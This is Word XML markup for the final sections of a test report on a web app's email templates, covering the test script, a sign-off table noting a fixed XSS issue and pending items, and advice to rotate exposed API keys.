      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>env</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.example</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with clearly fake placeholders (e.g. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>re_YOUR_RESEND_KEY_HERE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>). Rotate the exposed keys in Resend, Twilio, and any other affected services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546D7321" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="1B7744AE">
          <v:rect id="_x0000_i1042" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E6AE54" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6" w:rsidP="00020772">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="C9A84C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc228978589"/>
      <w:bookmarkStart w:id="39" w:name="test-asset"/>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="37"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="C9A84C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>9. Test Asset</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="7DBA9139"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The full automated test suite is saved at </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidRPr="00CD0784">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>scripts/test-</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00CD0784">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>emails.mjs</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79622732" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">It can be re-run at any time with no dependencies beyond Node.js v22+ and the project’s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>node_modules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It imports the TypeScript templates directly using Node’s </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>--experimental-strip-types</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag — no build step required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4586B428" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>node --experimental-strip-types scripts/test-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>emails.mjs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5BBA3A45" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exit code </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = all checks passed. Exit code </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = one or more checks failed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125A5DCF" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="499291EA">
          <v:rect id="_x0000_i1043" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCD8187" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6" w:rsidP="00020772">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="C9A84C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc228978590"/>
      <w:bookmarkStart w:id="41" w:name="sign-off"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="C9A84C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>10. Sign-off</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4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644"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="497E4BA6" w14:textId="77777777" w:rsidTr="00020772">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single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="79EEDBC6"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Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="5B7242EC" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="18451209" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0D28F91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8 email templates structurally valid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="77E7F23D"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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="1701855B" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2CD1B11F"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8 email templates content-correct</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0384C18A"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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="4786C6E5" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="3065ACB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8 templates have plain-text fallbacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="479F5B85"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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="7E2EB361" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="18892745"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All 8 emails delivered live via Resend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="60B44101"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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="0A056961" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="60A47F48"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HTML injection / XSS vulnerability fixed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="21B3CE7E"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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="575E7EC8" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0CA86B2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development branch ahead of main with all fixes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3423AADC"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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="40B7BDA2" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="5F3295B9"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Test script committed and reusable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="32A6B698"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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="15BABB0B" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="63F2D694"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No-show trigger wired</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="761EC6BA"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r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="4B8807AA" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="37A65702" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Stripe billing emails migrated to template system</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0364C28B"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r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Pending (optional)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="58429CDF" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C9AF54D" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>env</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.example</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> keys rotated and replaced with placeholders</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FC15E12" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>⚠️</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Recommended action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E890A08" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Overall verdict: Email system is production-ready on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>development</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> branch.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:sectPr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidSect="0002077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296" w:right="1584" w:bottom="1296" w:left="158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15ED3" w14:textId="77777777" w:rsidR="00591226" w:rsidRDefault="00591226" w:rsidP="00020772">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="06A41956" w14:textId="77777777" w:rsidR="00591226" w:rsidRDefault="00591226" w:rsidP="000207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Oswald">
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="2000020F" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000197"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034D2" w14:textId="77777777" w:rsidR="00020772" w:rsidRDefault="000207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244A3" w14:textId="15A8ACE1" w:rsidR="00020772" w:rsidRPr="00020772" w:rsidRDefault="00020772" w:rsidP="00020772">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="787777"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="787777"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="787777"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:noProof/>
        <w:color w:val="787777"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="787777"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="787777"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="787777"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> NUMPAGES \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="787777"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:noProof/>
        <w:color w:val="787777"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
